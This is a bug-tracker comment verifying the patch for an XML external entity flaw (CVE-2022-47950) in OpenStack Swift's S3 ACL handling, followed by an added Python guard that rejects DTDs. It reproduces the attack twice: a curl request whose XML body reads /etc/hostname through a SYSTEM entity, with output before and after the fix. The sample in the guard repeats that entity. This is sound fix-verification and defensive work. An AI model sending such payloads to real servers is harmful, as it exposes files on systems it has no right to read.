Comment 28 for bug 1998625

Alistair Coles (alistair-coles) wrote : Re: Arbitrary file access through custom S3 XML entities (CVE-2022-47950)

Checked the new version of the patch attached here https://bugs.launchpad.net/swift/+bug/1998625/comments/23, looks ok.

Before patch:
```
vagrant@vagrant:~/swift$ swift-init restart proxy
Signal proxy-server pid: 223087 signal: Signals.SIGTERM
Signal proxy-server pid: 223088 signal: Signals.SIGTERM
proxy-server (223088) appears to have stopped
proxy-server (223087) appears to have stopped
WARNING: Unable to modify max process limit. Running as non-root?
Starting proxy-server...(/etc/swift/proxy-server/proxy-noauth.conf.d)
Starting proxy-server...(/etc/swift/proxy-server/proxy-server.conf.d)

vagrant@vagrant:~/swift$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: 4fd507f2889d8d42ee3e03fb20860748c0e5921dc345676d85fae0cc5891dfdf" -H "X-Amz-Date: 20230113T123756Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20230113/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=054202b4db5e2d6e047f7abc6964555bb36538a265399bfdcff13bbe32c1e95b" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>foo &xxe;</DisplayName>
            <ID>foo &xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'

vagrant@vagrant:~/swift$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "foo vagrant\n",
                "ID": "foo vagrant\n",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```

After patch:
```
vagrant@vagrant:~/swift$ swift-init restart proxy
Signal proxy-server pid: 223110 signal: Signals.SIGTERM
Signal proxy-server pid: 223111 signal: Signals.SIGTERM
proxy-server (223110) appears to have stopped
proxy-server (223111) appears to have stopped
WARNING: Unable to modify max process limit. Running as non-root?
Starting proxy-server...(/etc/swift/proxy-server/proxy-noauth.conf.d)
Starting proxy-server...(/etc/swift/proxy-server/proxy-server.conf.d)

vagrant@vagrant:~/swift$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: 4fd507f2889d8d42ee3e03fb20860748c0e5921dc345676d85fae0cc5891dfdf" -H "X-Amz-Date: 20230113T123756Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20230113/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=054202b4db5e2d6e047f7abc6964555bb36538a265399bfdcff13bbe32c1e95b" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>foo &xxe;</DisplayName>
            <ID>foo &xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'

vagrant@vagrant:~/swift$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "foo ",
                "ID": "foo ",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```

Checked that the unit tests fail if the fix is reverted.

Unable to confirm the functional test due to something awry with boto on my vsaio (not specific to the new functional test).
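As an added illustration (not part of this bug comment and not the Swift fix itself), the pre-parse guard below shows the defensive pattern behind the "after patch" output above: S3 ACL bodies never legitimately carry a DTD, so a body that declares one is refused before any entity can be expanded. It uses only the Python standard library (expat for the DOCTYPE check, ElementTree for the ACL itself); the sample bodies are constructed here and reuse the DOCTYPE from the reproduction in this comment, and the function and exception names are hypothetical.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

S3_NS = "{http://s3.amazonaws.com/doc/2006-03-01/}"


class RejectedBody(ValueError):
    """Raised when an ACL body carries a DTD, which S3 documents never need."""


def reject_dtd(body: bytes) -> None:
    """Walk the body with expat and refuse it as soon as a DOCTYPE appears.
    Using the parser's own handler on the decoded document (rather than a
    regex over raw bytes) keeps the check independent of the body's encoding."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedBody("DOCTYPE %r in request body" % name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        # Malformed XML is reported by the real parse below; this pass only
        # exists to catch a DTD before anything else sees the document.
        pass


def parse_acl_grants(body: bytes) -> list:
    """Return (grantee ID, permission) pairs from an AccessControlPolicy body,
    refusing any body that declares a DTD before it reaches ElementTree."""
    reject_dtd(body)
    root = ET.fromstring(body)
    if root.tag != S3_NS + "AccessControlPolicy":
        raise ValueError("unexpected root element %r" % root.tag)
    grants = []
    for grant in root.iter(S3_NS + "Grant"):
        grantee = grant.find(S3_NS + "Grantee")
        perm = grant.find(S3_NS + "Permission")
        gid = grantee.findtext(S3_NS + "ID") if grantee is not None else None
        grants.append((gid, perm.text if perm is not None else None))
    return grants


def is_rejected(body: bytes) -> bool:
    """True when the guard refuses the body (hypothetical helper for callers)."""
    try:
        parse_acl_grants(body)
    except RejectedBody:
        return True
    return False


# Constructed sample: a benign ACL, and the same ACL prefixed with the DOCTYPE
# from the reproduction above and an entity reference in the grantee ID.
BENIGN_ACL = (
    b'<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
    b"<Owner><DisplayName>test:tester</DisplayName><ID>test:tester</ID></Owner>"
    b"<AccessControlList><Grant>"
    b'<Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    b'xsi:type="CanonicalUser"><DisplayName>foo</DisplayName><ID>foo</ID></Grantee>'
    b"<Permission>WRITE</Permission></Grant></AccessControlList></AccessControlPolicy>"
)
DTD_ACL = (b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>\n'
           + BENIGN_ACL.replace(b"<ID>foo</ID>", b"<ID>foo &xxe;</ID>"))
```

Refusing the DTD outright (as a MalformedACLError in S3 terms) is a stricter stance than leaving references unexpanded, which is what the `"foo "` in the patched output reflects; either way the file contents never reach the stored ACL.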